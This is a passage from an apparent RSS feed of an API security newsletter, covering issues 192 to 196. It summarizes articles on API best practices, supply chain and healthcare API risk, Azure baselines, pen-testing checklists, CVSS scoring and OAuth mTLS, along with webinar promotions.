<p>A few suggestions for improving supply chain security include:</p>
<ul>
<li>Perform an audit of the <em>entire</em> supply chain to understand all the constituent components and their risk profiles.</li>
<li>Use a zero trust model — assume that other components and interfaces are potentially hostile and ensure that constant authentication, authorization, and validation are enforced.</li>
<li>Beware of 3rd party providers and enforce minimum security standards and acceptance criteria.</li>
</ul>
<p>I predict we&#8217;ll be hearing a lot more about the software supply chain for APIs in the near future.</p>
<h2>Article: API adoption in the healthcare industry</h2>
<p>The Health IT Security website has featured an  <a href="https://healthitsecurity.com/features/increasing-api-adoption-while-addressing-healthcare-cybersecurity-concerns" target="_blank" rel="noopener noreferrer">article on the increasing adoption of APIs in the healthcare industry</a>  and how organizations are challenged to manage the associated cyber security risks. The healthcare industry has been at the forefront of API adoption, allowing for rapid integration and interchange of health data. The adoption of the HL7 FHIR standard has further accelerated API adoption to such an extent that recent research suggests a whopping 941% increase in API usage in health monitoring.</p>
<p>Unfortunately, as readers of this newsletter are only too well aware, these APIs provide an additional attack vector allowing for potential leaking of PII and confidential patient health data. This conflict between increased adoption and risk is captured nicely by the quote:</p>
<blockquote class="blockquote"><p>“<em>From a healthcare standpoint, I see it as this aspect of duality. Healthcare needs to provide easier access to more data. But because of that, it must have a greater focus on data privacy and security.</em>”</p></blockquote>
<p>The author lists a number of recommendations and best practices, including:</p>
<ul>
<li>Focus on the fundamentals, and get the basics right.</li>
<li>Leverage API management portals and API gateways, and enable their security features.</li>
<li>Implement strong authentication and authorization controls.</li>
<li>Implement Transport Level Security (TLS) 1.2 or higher.</li>
<li>Exercise caution in granting access to systems and managing token life cycles.</li>
</ul>
<p>Balancing the speed of innovation versus risk exposure is challenging — the key is the automation of API security.</p>
<h2>Guide: Azure API management security baseline</h2>
<p>Microsoft Azure has recently published their <a href="https://docs.microsoft.com/en-us/security/benchmark/azure/baselines/api-management-security-baseline" target="_blank" rel="noopener noreferrer">guidance of security baselines for API management</a>. Whilst this is of specific interest to Azure users, many of their recommendations are applicable to other API management systems.</p>
<p>Their recommendations cover domains like network, identity management, privileged access, data protection, asset management, logging and threat protection, and backup and recovery.</p>
<p>For networks, they suggest:</p>
<ul>
<li>Establish network segmentation boundaries.</li>
<li>Secure cloud services with network controls.</li>
<li>Deploy web application firewall.</li>
</ul>
<p>On identity management, they recommend to:</p>
<ul>
<li>Use a centralized identity and authentication system.</li>
<li>Manage application identities securely and automatically.</li>
<li>Use single sign-on (SSO) for application access.</li>
<li>Restrict access to resources based on conditions.</li>
<li>Restrict the exposure of credential and secrets.</li>
</ul>
<p>For privileged access, they suggest:</p>
<ul>
<li>Separate and limit the access of highly privileged and/or administrative users from that of regular users.</li>
<li>Follow the principle of  just-enough-administration (aka least-privilege).</li>
<li>Determine access process for cloud provider support.</li>
</ul>
<p>On data protection and handling of sensitive data, they state the following:</p>
<ul>
<li>Discover, classify, and label sensitive data.</li>
<li>Monitor anomalies and threats targeting sensitive data.</li>
<li>Encrypt sensitive data in transit.</li>
<li>Use a secure key and certificate management processes.</li>
</ul>
<p>For asset management, they recommend only using approved services.</p>
<p>As for logging and threat protection, they recommend to:</p>
<ul>
<li>Enable threat detection capabilities.</li>
<li>Enable logging for security investigation.</li>
</ul>
<p>Being solid common sense, the list comes as no surprise, but it is well worth ensuring these basics are implemented as your standard.</p>
<h2>Training: Free software security course from the Linux Foundation</h2>
<p>Finally this week, we have a topic of more general interest to anyone developing software: the Linux Foundation is offering their course <a href="https://training.linuxfoundation.org/training/developing-secure-software-lfd121/" target="_blank" rel="noopener noreferrer">&#8220;Developing Secure Software (LFD121)&#8221;</a> free of charge. In my experience as a secure software advocate, this course is a really great introduction to the topic and would be a worthwhile endeavor for anyone writing software.</p>
<p>The key topics of interest include:</p>
<ul>
<li>Requirements, design and reuse</li>
<li>Security basics</li>
<li>Secure design principles</li>
<li>Input validation</li>
<li>Processing data securely</li>
<li>Verification</li>
<li>Threat modeling</li>
<li>Cryptography</li>
</ul>
<p>Thanks to the Linux Foundation for making this invaluable resource available for free.</p>
<h2>Webinar: Review of API Breaches in H1 2022: Episode two — Remediation and Prevention</h2>
<p>Last month, I presented a webinar on a dozen API breaches covered in this newsletter so far this year, and in August, I&#8217;ll be hosting the <a href="https://42crunch.com/api-breaches-h1-2022/" target="_blank" rel="noopener noreferrer">second part of this popular webinar</a>.</p>
<p>In this webinar, I&#8217;ll be getting into practical guidance on how to prevent and remediate some of these types of breaches. In particular, we&#8217;ll focus on the following topics:</p>
<ul>
<li>Applying defensive coding practices to secure APIs.</li>
<li>Practical demonstration of how 42Crunch can detect and protect APIs from such vulnerabilities.</li>
</ul>
<p><a href="https://42crunch.com/api-breaches-h1-2022/" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="alignnone wp-image-9830" src="https://apisecurity.io/wp-content/uploads/2022/07/Artilcle5.jpg" alt="" width="604" height="178" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-196-software-supply-chains-apis-in-healthcare-azure-api-management-baselines/">Issue 196: Software supply chains, APIs in healthcare, Azure API management baselines</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 195: How DevOps teams defend against API attacks, empathy for the API developer</title>
		<link>https://apisecurity.io/issue-195-how-devops-teams-defend-against-api-attacks-empathy-for-the-api-developer/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 28 Jul 2022 21:00:22 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9846</guid>

					<description><![CDATA[<p>This week, we have articles on how DevOps teams can defend against API attacks, my views on how empathy for API developers can be a driver toward greater security, and eight measures to improve API security. We also have views on why API gateways might not be sufficient for API security, and finally, a report [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-195-how-devops-teams-defend-against-api-attacks-empathy-for-the-api-developer/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-195-how-devops-teams-defend-against-api-attacks-empathy-for-the-api-developer/">Issue 195: How DevOps teams defend against API attacks, empathy for the API developer</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have articles on how DevOps teams can defend against API attacks, my views on how empathy for API developers can be a driver toward greater security, and eight measures to improve API security. We also have views on why API gateways might not be sufficient for API security, and finally, a report from Approov on the state of mobile application security in 2022.</p>
<h2>Article: How DevOps teams can defend against API attacks</h2>
<p>First up this week, we have an an excellent article from DevOps.com discussing <a href="https://devops.com/how-devops-teams-can-defend-against-api-attacks/" target="_blank" rel="noopener noreferrer">how DevOps teams can participate in the defense of APIs against attacks</a>. The author offers a novel viewpoint:</p>
<blockquote><p>&#8220;<cite>the security practices that DevOps teams already have in place to defend against ransomware can be repurposed to deliver API security, too—with a few tweaks.&#8221;</cite></p></blockquote>
<p>The first recommendation for the defense of APIs is to <em>prevent lateral movement</em>: whilst it is impossible to prevent API threats from reaching your perimeter, it is possible to <em>limit</em> their propagation and impact by preventing attackers from pivoting to other internal systems. The key to this approach is the early detection of the initial malicious activity, as early detection allows prevention.</p>
<p>For me, the most salient observation from the author is that DevOps teams <em>focus on data security</em> — ultimately, the goal of the attacker is to get access to valuable corporate data. Much like the case with ransomware, attackers target data and hold organizations to ransom over access to that data. For APIs, the threats are even greater: the data can be exfiltrated and sold for profit or to damage the reputation of the organization. Data protection practices should be employed, including tight and granular access controls on data, and segmentation of access between internal and external APIs.</p>
<p>The author highlights the ineffectiveness of signature-based detection methods, because these tend to be impervious to zero-day attacks or unknown attacks. By using behavioral security models, defense teams can model standard API behaviors and usage patterns to be able to detect anomalies to this behavior, which may indicate a compromise. APIs tend to be accessed in standard patterns, making it feasible to detect unusual behavior like that of a human adversary.</p>
<p>The author advises against being overly reliant on perimeter-based defenses — as documented in this newsletter and elsewhere, firewalls and WAFs are notoriously ineffective at preventing focused API attacks.</p>
<p>Finally, the author stresses the importance of looking beyond the surface: using a layered defense mechanism and understanding how an attacker might attack your API assets and, for example, opting to place your APIs behind non-standard ports or protocols.</p>
<p>Some really insightful advice here on how to use your existing protection mechanisms to protect your APIs.</p>
<h2>Article: Empathy for the API developer</h2>
<p><a href="https://devops.com/empathy-for-the-api-developer/" target="_blank" rel="noopener noreferrer">I was pleased to be featured</a> in DevOps.com this week, discussing the importance of developing empathy for API developers to achieve better API security outcomes. In my two decades of working on both sides of the developer-&#8220;versus&#8221;-security fence, I believe I have some insights on better ways to work <em>together</em>.</p>
<p>First, let&#8217;s understand why insecure code exists in the first place: software development is a complex undertaking fraught with many opportunities for introducing weaknesses and vulnerabilities. Some of the reasons include:</p>
<ul>
<li>Developers are overly optimistic — they are creative problem solvers who don&#8217;t always expect the unexpected.</li>
<li>Overconfidence — developers often think they have a better understanding of complex software frameworks than is actually the case, leading to unintentionally insecure software.</li>
<li>Bad things only happen to other developers — Think of this as a kind of <em>schadenfreude</em> for developers.</li>
<li>Taking shortcuts — we&#8217;ve all done it, a missing null pointer check, or an unhandled error condition. These can have significant security impacts.</li>
<li>Technical debt or legacy code — this is probably the number one cause of insecure software.</li>
<li>This stuff is difficult — developers work under pressure on numerous fronts, and security is only one of their considerations.</li>
</ul>
<p>API security offers some unique opportunities to break down these barriers between developers and security teams.</p>
<ul>
<li>Firstly, the <em>positive security model</em> (more on this in the last piece this week) allows a far more precise definition of the expected behavior of an API — traditional security tools (WAFs, firewalls, SAST) attempt to prevent or detect <em>known bad </em>which can result in both high false positives and high false negatives. This leads to frustration for security teams and developers who feel they are tasked with unnecessary remediation work.</li>
<li>Secondly, using a design-first approach based on OpenAPI definitions allows security policy to be injected as code in the CI/CD process. No longer do developers need to try and guess the applicable policies, instead these can be expressed concisely in code.</li>
</ul>
<p>It all comes down to this: <cite>&#8220;help developers to help themselves by building empathy and working with them rather than against them.&#8221;</cite></p>
<h2>Article: Eight security measures to improve API security</h2>
<p>Next up, we have <a href="https://www.itbusinessedge.com/applications/api-security-measures/" target="_blank" rel="noopener noreferrer">another good read on security measures that can improve API security</a>. The author identifies the following eight areas for focus in improving API security:</p>
<ul>
<li><strong>Build for future users, not present ones:</strong> Design APIs with security in mind at the outset — common pitfalls include not implementing proper access controls in development, only to find the API is released to production without the necessary controls.</li>
<li><strong>Limit users:</strong> Reduce the attack surface by limiting the number of users that have access to APIs (for example, by using tokens with limited scope, or validity periods).</li>
<li><strong>Limit data:</strong> Avoid collecting and aggregating more data than necessary for an API function to minimize the danger of accidentally leaking more data than you intended to expose.</li>
<li><strong>Encrypt data:</strong> An obvious one, but make sure all data is encrypted, both at rest and in transit (use TLS in all cases).</li>
<li><strong>Enact pagination limits:</strong> Excessive data exfiltration can be prevented by using well-designed pagination controls at the API level.</li>
<li><strong>Use prepared statements in SQL queries:</strong> Although over two decades old, SQL injection attacks are still prevalent and can be totally avoided by using prepared statements in SQL queries.</li>
<li><strong>Strengthen end user and application authentication:</strong> Use best practices for authentication, including password and token rotation and revocation, and limited scopes and roles.</li>
<li><strong>Impose rate limiting:</strong> Another obvious one is the judicious use of rate limiting on sensitive API endpoints, such as password reset or registration methods.</li>
</ul>
<p>There&#8217;s no silver bullet toward API security, but a good layered defense approach eliminates many of the basic attack vectors.</p>
<h2>Article: Why your API gateway is not enough for API security</h2>
<p>A perennial hot topic when discussing API security is the role of the API gateway, and <a href="https://www.helpnetsecurity.com/2022/07/06/why-your-api-gateway-is-not-enough-for-api-security/" target="_blank" rel="noopener noreferrer">this week HelpNetSecurity provide their thoughts</a> on the topic. The author&#8217;s view is that API gateways serve a particular purpose: route API traffic from external interfaces to the corresponding internal services. These API gateways were therefore not designed with API security at the top of the requirement list.</p>
<p>A good example is that of token leaks or theft: once an attacker harvests an API token, the API gateway is powerless to stop attacks that use this token because the attacks are indistinguishable from normal requests. Also, API gateways can provide a false sense of security: not all APIs are routed through the gateway, meaning that additional attack surfaces that are not visible to the gateway do in fact exist. Many API attacks are sophisticated, relying on coding or logic errors in the API backend, and gateways are simply unable to protect from these more complex attacks.</p>
<p>The author recommends using more modern WAAP (Web Application and API Protection) technology to provide API protection; however, these have their drawbacks, being built upon a negative security model. This week&#8217;s featured upcoming webinar discusses how a <em>positive security model</em> can overcome these limitations.</p>
<h2>Report: The state of mobile application security in 2022</h2>
<p>Finally this week <a href="https://www.businesswire.com/news/home/20220714005251/en/Approov-and-Osterman-Research-Issue-%E2%80%9CThe-State-of-Mobile-App-Security-in-2022%E2%80%9D" target="_blank" rel="noopener noreferrer">comes a report from our friends at Approov</a> on the state of mobile application security in 2022. Unsurprisingly, the report highlights the deleterious effects that poor API security has on the overall security of mobile applications. Frequently, attackers use mobile APIs as the primary attack vector, rather than the mobile application itself.</p>
<p>The full report makes interesting reading, but from an API security perspective the following findings are of interest:</p>
<ul>
<li>Run-time attacks against APIs that render mobile applications non-functional prove costly to 75% of organizations.</li>
<li>Over 60% of organizations lack visibility into runtime threats against mobile applications and APIs.</li>
<li>Reducing threats that result from hard-coded API keys is a priority — over half of mobile applications that the report looked at used hard-coded keys embedded in the application.</li>
<li>Third-party APIs create pathways for threat actors — typically mobile applications depend on more than 30 third-party APIs!</li>
</ul>
<p>The report provides a nice illustration of how API security underpins the security of higher layers of the application stack — attackers simply do not bother attacking the application layer when they can go directly at the API layer.</p>
<h2>Webinar: Benefits of a Positive Security Model</h2>
<p>Positive Security is a model that <em>enables</em> access to <em>known trusted</em> resources, rather than trying to determine what activity or entities have hostile intent. Applying a positive security model when protecting your APIs can offer direct benefits, such as reducing false negatives and lowering reliance on constantly adding to the characteristics of what constitutes hostile traffic. It also has indirect benefits for the working groups on your DevSecOps team, allowing them to focus and be more efficient in their individual roles.</p>
<p><a href="https://42crunch.com/benefits-of-a-positive-security-model-set-solutions/" target="_blank" rel="noopener noreferrer">Join Michael Farnum (CTO at Set Solutions) and me</a> on August 2, 2022, at 10:00 CDT / 16:00 BST as we dig into both the direct and indirect benefits of a positive API security model, and explain how 42Crunch can apply that model to your APIs.</p>
<p><a href="https://42crunch.com/benefits-of-a-positive-security-model-set-solutions/" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="alignnone wp-image-9854" src="https://apisecurity.io/wp-content/uploads/2022/07/Article6.jpg" alt="" width="605" height="199" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-195-how-devops-teams-defend-against-api-attacks-empathy-for-the-api-developer/">Issue 195: How DevOps teams defend against API attacks, empathy for the API developer</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 194: API testing checklist, API security testing resources, CVSS for API security</title>
		<link>https://apisecurity.io/issue-194-api-testing-checklist-api-security-testing-resources-cvss-for-api-security/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 21 Jul 2022 15:47:34 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9819</guid>

					<description><![CDATA[<p>This week, we have a very popular API testing checklist aimed at pen-testers, a comprehensive guide to tips &#38; tricks, and resources related to API security and API pen-testing. We also have an article from Cisco on using CVSS to tackle API security, and finally, a 10-year journey in API security vulnerabilities with Ivan Novikov. [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-194-api-testing-checklist-api-security-testing-resources-cvss-for-api-security/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-194-api-testing-checklist-api-security-testing-resources-cvss-for-api-security/">Issue 194: API testing checklist, API security testing resources, CVSS for API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have a very popular API testing checklist aimed at pen-testers, a comprehensive guide to tips &amp; tricks, and resources related to API security and API pen-testing. We also have an article from Cisco on using CVSS to tackle API security, and finally, a 10-year journey in API security vulnerabilities with Ivan Novikov.</p>
<h2>Guide: API testing checklist</h2>
<p>The <a href="https://hackanythingfor.blogspot.com/2020/07/api-testing-checklist.html" target="_blank" rel="noopener noreferrer">excellent checklist from Latish Danawale on API testing</a> was very popular this week with our Twitter followers, and for good reason: it&#8217;s filled with invaluable nuggets and gems based on his wealth of experience. The guide perhaps geared more towards API pen-testers, but it&#8217;s well worth a skim read for anyone working with APIs to get a perspective on adversaries&#8217; tactics (and talents).</p>
<p>For me, some of the standouts included:</p>
<ul>
<li><cite>&#8220;Older APIs versions tend to be more vulnerable and lack security mechanisms&#8221; —</cite> Always try and discover older API endpoints (like going for <code>/v1</code>) which may not be as well protected as more recent versions. For defenders, always make sure older, less secure versions of APIs are deprecated and removed from production.</li>
<li><cite>&#8220;Mass Assignment is a real thing&#8221;</cite> — By utilizing object-relational-mappers (ORMs), it is easy for developers to assign request input data to the database layer. However, this can lead to mass assignment vulnerabilities where attackers can overwrite supposedly private data fields.</li>
<li><cite>&#8220;Even if the ID is GUID or non-numeric, try to send a numeric value&#8221;</cite> — It&#8217;s possible that the authorization mechanism tests for both non-numeric and numeric IDs, try both just in case.</li>
<li><cite>&#8220;Mobile Certificate Pinning?&#8221;</cite> — Older versions of mobile apps may lack certificate pinning, making it a lot easier to reverse engineer the backend APIs.</li>
<li><cite>&#8220;APIs tend to leak PII by design&#8221;</cite> — Backend often returns overly verbose JSON data and relies on the frontend to mask this data. Unfortunately, this is easy for an attacker to intercept in the browser.</li>
<li><cite>&#8220;GitHub Dorks for Finding API Keys, Tokens and Passwords&#8221;</cite> — Finally, the author lists a number of &#8220;GitHub dorks&#8221; to use to try discover API credentials accidentally stored online.</li>
</ul>
<h2>Guide: Resources for API security testing</h2>
<p>Next up this week, we have another great resource for API security testers, this time from Momen Eldawakhly <a href="https://github.com/Cyber-Guy1/API-SecurityEmpire" target="_blank" rel="noopener noreferrer">who brings us his API Security Empire</a>. Again targeted at API security pen-testers, Eldawakhly focuses firstly on reconnaissance, and then on specific attack techniques against REST, SOAP, and GraphQL APIs.</p>
<p>The mind-map for REST APIs is incredibly detailed and thorough, focusing on each of the OWASP API Security Top 10 in turn. As an example of the wealth of information in this mind-map, here&#8217;s a snippet from the section on broken user authentication:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-9832" src="https://apisecurity.io/wp-content/uploads/2022/07/Article2.jpg" alt="" width="602" height="404" /></p>
<p>Another great resource for API testers.</p>
<h2>Article: Tackling API security with CVSS</h2>
<p>Changing topics entirely, next up is <a href="https://techblog.cisco.com/blog/tackle-api-security-with-cvss" target="_blank" rel="noopener noreferrer">a post from the Cisco research team</a> on how to use the Common Vulnerability Scoring System (CVSS) to score API vulnerabilities based on their likelihood of impact. CVSS is popular in the IT security industry as it claims to offer a standard, well-understood scoring system for vulnerabilities to allow organizations to prioritize remediation efforts.</p>
<p>A CVSS is calculated using three elements:</p>
<ul>
<li>Baseline, which comprises of the attack vector, attack complexity, required privileges, user interaction, scope, and  the impact on confidentiality, integrity and availability (the CIA analysis).</li>
<li>Temporal, which comprises of exploit code maturity, remediation level, and report confidence.</li>
<li>Environment factors, specific factors which may affect the baseline scoring, such as vulnerable host platforms.</li>
</ul>
<p>The author highlights a new Cisco platform (Panoptica) designed to identify APIs through a service mesh or Kubernetes deployments and then to add risk context to these APIs. Having a single view of APIs ranked by CVSS score allows teams to tackle the biggest issues first. Unfortunately, little detail is provided on the actual methodology used to provide this risk context.</p>
<h2>Article: Ten years of API security vulnerabilities</h2>
<p>Finally, this week, <a href="https://securityboulevard.com/2022/07/10-years-journey-into-api-security-vulnerabilities-with-ivan-the-ceo-of-wallarm/" target="_blank" rel="noopener noreferrer">we have perspectives from API security veteran Ivan Novikov</a> , covering his ten-year journey in API security vulnerabilities. The report covers over 10,000 CVEs, BugBounty reports, exploits, and data from Novikov&#8217;s personal research over this period.</p>
<p>The key takeaways from the article are:</p>
<ul>
<li><strong>Five API exploits happen every day</strong>: Readers of this newsletter will not be surprised that&#8217;s the first on the list. Exploits have been steadily increasing over the last decade, and since 2020 they have averaged to over five per day.</li>
<li><strong>The use of non-web APIs is rising</strong>: Although REST APIs dominate API traffic, there is an increasing share from non-web APIs, such as BAPI, Android, and iOS, to name but a few.</li>
<li><strong>CVSS score is ~6.0 since 1998</strong>: Segueing nicely from the previous article on CVSS, on average API vulnerabilities score 6.0 on the CVSS scale (from 0.0 to 10.0), so classed as high risk.</li>
</ul>
<p>Novikov makes two additional observations. Firstly, that the threat to APIs is likely higher than indicated by the CVSS score alone — measuring by exploitability alone, the CVSS score is likely nearer to 9, meaning super high risk. Secondly, the findings indicate that nearly half of organizations are using legacy API protocols — using more modern and inherently more secure protocols can reduce your API risk.</p>
<h2>Webinar: Review of API Breaches in H1 2022: Episode two — Remediation and Prevention</h2>
<p>Last month, I presented a webinar on a dozen API breaches covered in this newsletter so far this year, and in August, I&#8217;ll be hosting the <a href="https://42crunch.com/api-breaches-h1-2022/" target="_blank" rel="noopener noreferrer">second part of this popular webinar</a>.</p>
<p>In this webinar, I&#8217;ll be getting into practical guidance on how to prevent and remediate some of these types of breaches. In particular, we&#8217;ll focus on the following topics:</p>
<ul>
<li>Applying defensive coding practices to secure APIs.</li>
<li>Practical demonstration of how 42Crunch can detect and protect APIs from such vulnerabilities.</li>
</ul>
<p><a href="https://42crunch.com/api-breaches-h1-2022/" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="alignnone wp-image-9830" src="https://apisecurity.io/wp-content/uploads/2022/07/Artilcle5.jpg" alt="" width="601" height="177" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-194-api-testing-checklist-api-security-testing-resources-cvss-for-api-security/">Issue 194: API testing checklist, API security testing resources, CVSS for API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 193: Five API security best practices, AppSec tools for APIs</title>
		<link>https://apisecurity.io/issue-193-five-api-security-best-practices-appsec-tools-for-apis/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 14 Jul 2022 16:13:12 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9798</guid>

					<description><![CDATA[<p>This week, we have five best practices from SoftwareAGGov for API security, and views from Jeff Williams at Contrast Security on the suitability (or not) of application security (AppSec) testing tools for API security. We also feature guides on how to secure partner API integrations with OAuth mTLS and on what to look for in [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-193-five-api-security-best-practices-appsec-tools-for-apis/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-193-five-api-security-best-practices-appsec-tools-for-apis/">Issue 193: Five API security best practices, AppSec tools for APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have five best practices from SoftwareAGGov for API security, and views from Jeff Williams at Contrast Security on the suitability (or not) of application security (AppSec) testing tools for API security. We also feature guides on how to secure partner API integrations with OAuth mTLS and on what to look for in selecting API tools.</p>
<h2>Article: Five best practices for API security</h2>
<p>First up this week is <a href="https://www.softwareaggov.com/insights/5-best-practices-for-api-security-in-2022/" target="_blank" rel="noopener noreferrer">an article from the team at SoftwareAGGov</a> on their suggestions for five best practices for API security. Whilst we have covered many best-practice lists previously, I liked the slightly more strategic view that the authors take in their guidance.</p>
<p>Their five best practices are:</p>
<ul>
<li><strong>Understanding your data</strong>: APIs are primarily a conduit for data transfer and API security should start with a focus on the data: what data do you own, how sensitive is that data, and who should have access to iy?  Beware of accidentally leaking private data from excessively verbose logging or API responses (this is <a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure" target="_blank" rel="noopener noreferrer">API3:2019 — Excessive data exposure</a>, a frequently encountered API vulnerability)</li>
<li><strong>Understanding your APIs</strong>: As the authors state,<cite> &#8220;You must know what you have in order to know what to protect.&#8221;</cite> A complete and accurate API inventory is essential to being able to address API security. In particular, be aware of your shadow APIs (hidden APIs) or zombie APIs (deprecated or unsupported APIs) which present an unquantified risk.</li>
<li><strong>Understanding your users</strong>: Robust authentication is vital to ensure that users are who they say they are, and that they only have access to their own resources. Regularly test your authentication framework and ensure that granular access control is applied.</li>
<li><strong>Knowing your tools</strong>: Good API security relies on selecting and using various API security tools, including API management platforms and API gateways. Ensure that the security features are fully utilized, and beware of gaps in your coverage. A defense-in-depth strategy is a key to good security.</li>
<li><strong>Securing everything</strong>: Again, take a multi-pronged approach to API security by applying controls and measures at various levels.</li>
</ul>
<p>Some solid, basic advice here — there&#8217;s no silver bullet for API security.</p>
<h2>Article: Using AppSec tools for APIs</h2>
<p>Jeff Williams, the founder and CTO of Contrast Security, is also one of the founders of OWASP and has over two decades in the software security industry, so it&#8217;s always worth listening to what he has to say on the topic of API security. <a href="https://www.contrastsecurity.com/security-influencers/no-api-security-no-appsec" target="_blank" rel="noopener noreferrer">In his most recent blog post</a>, he explores the somewhat contentious topic of the suitability and effectiveness of using traditional AppSec tools, such as static application security testing (SAST) and dynamic application security testing (DAST), for API security.</p>
<p>He starts by taking a look into the suitability of DAST for testing APIs. The first problem here is that DAST tools lack knowledge of how to interpret HTTP responses: if an injection attack is made, how does the scanner know if the attack succeeded or failed? If an <code>HTTP 500</code> error is returned, did the injection attack happen, or did the API fail before it due to malformed input? The other problem relates to the inability of DAST scanners to create valid API input to fully exercise (and exploit) the API adequately. This leads to high false negatives — DAST tends not to find much when scanning APIs.</p>
<p>Secondly, he takes a dim view of the ability of SAST to find meaningful and actionable findings in API source code. SAST does not have the context of data flows within the source code and often fails to detect API entry points, thereby missing possible attack vectors. SAST often highlights issues in source code that prove to be false positives in the context of the application.</p>
<p><a href="https://thenewstack.io/application-security-tools-are-not-up-to-the-job-of-api-security/" target="_blank" rel="noopener noreferrer">I&#8217;ve previously written</a> on the same topic and find myself in general agreement with Jeff — a very interesting read.</p>
<h2>Guide: Securing partner API integrations with OAuth mTLS</h2>
<p>Next, we have <a href="https://securityboulevard.com/2022/03/securing-partner-api-integrations-with-oauth-mtls/" target="_blank" rel="noopener noreferrer">an in-depth technical article</a> from Cloudentity on securing partner API integrations with OAuth mTLS using their platform.</p>
<p>The authors explore two common approaches to secure API integrations: bearer tokens and certificates in mTLS mode. Bearer tokens can be used to authorize a client to access an API, but they have the obvious problem that <em>whoever</em> has access to that bearer token has access to the API. The use of certificates on the other hand provides strong authentication but lacks the ability to provide more fine-grained authorization, like access tokens with scopes can do.</p>
<p>To overcome the weaknesses inherent in each of these methods, the authors suggest a combination of the two, namely OAuth client authentication using mutual TLS, either by self-signed certificates or public key infrastructure (PKI). This approach provides two key benefits:</p>
<ul>
<li>An mTLS token endpoint with mTLS/self-signed client authentication methods for access tokens</li>
<li>Certificate-bound access tokens with scoped access</li>
</ul>
<p>The authors conclude that <cite>&#8220;it’s all our responsibility to keep the data traveling across the wire safe from misuse&#8221;.</cite></p>
<h2>Article: What to look for in API security tools</h2>
<p>To round up this week, we have <a href="https://dzone.com/articles/api-security-tools-what-to-look-for" target="_blank" rel="noopener noreferrer">an article from DZone</a> on what to look for in API security tools. Before even starting to evaluate tools, the organization should begin with the question of what is their ultimate goal. Do they want to achieve compliance, reduce risk, or meet contractual obligations? Understanding the goal will inform the decision-making process.</p>
<p>The next key consideration is how the tool will be operated and deployed. Will you build a team internally, use external specialists, or use vendor resources? This factor can have a significant impact on the total cost of ownership.</p>
<p>Specific to API security, the author suggests the following criteria:</p>
<ul>
<li>OWASP API Security Top 10 detection</li>
<li>Runtime protection</li>
<li>API inventory</li>
<li>Fuzzing</li>
<li>Reporting</li>
</ul>
<p>Finally, the author makes the same point made in the first article today: there is no single tool that will fix everything, so finding the combination of tools best suited for your needs is the key.</p>
<h2>Webinar: Review of API Breaches in H1 2022: Episode two — Remediation and Prevention</h2>
<p>Last month, I presented a webinar on a dozen of API breaches covered in this newsletter so far this year and next week, on the 21st July, I&#8217;ll be hosting the <a href="https://42crunch.com/api-breaches-h1-2022/" target="_blank" rel="noopener noreferrer">second part of this popular webinar</a>.</p>
<p>In this webinar, I&#8217;ll be getting into practical guidance on how to prevent and remediate some of these types of breaches. In particular, we&#8217;ll focus on the following topics:</p>
<ul>
<li>Applying defensive coding practices to secure APIs.</li>
<li>Practical demonstration of how 42Crunch can detect and protect APIs from such vulnerabilities.</li>
</ul>
<p>&nbsp;</p>
<p><a href="https://42crunch.com/api-breaches-h1-2022/" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="alignnone wp-image-9791" src="https://apisecurity.io/wp-content/uploads/2022/07/Article5.jpg" alt="" width="605" height="165" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-193-five-api-security-best-practices-appsec-tools-for-apis/">Issue 193: Five API security best practices, AppSec tools for APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 192: Vulnerable APIs costing $75 billion, new Google API security platform</title>
		<link>https://apisecurity.io/issue-192-vulnerable-apis-costing-75-billion-new-google-api-security-platform/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 06 Jul 2022 16:35:52 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9772</guid>

					<description><![CDATA[<p>This week, we have a report from Imperva indicating that vulnerable APIs may be costing as much as $75 billion annually with the largest organizations being at the highest risk. We also have coverage of the new API security platform from Google, views from Curity on API-driven backends for frontends for increased API security, and [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-192-vulnerable-apis-costing-75-billion-new-google-api-security-platform/">Read More...</a></p>
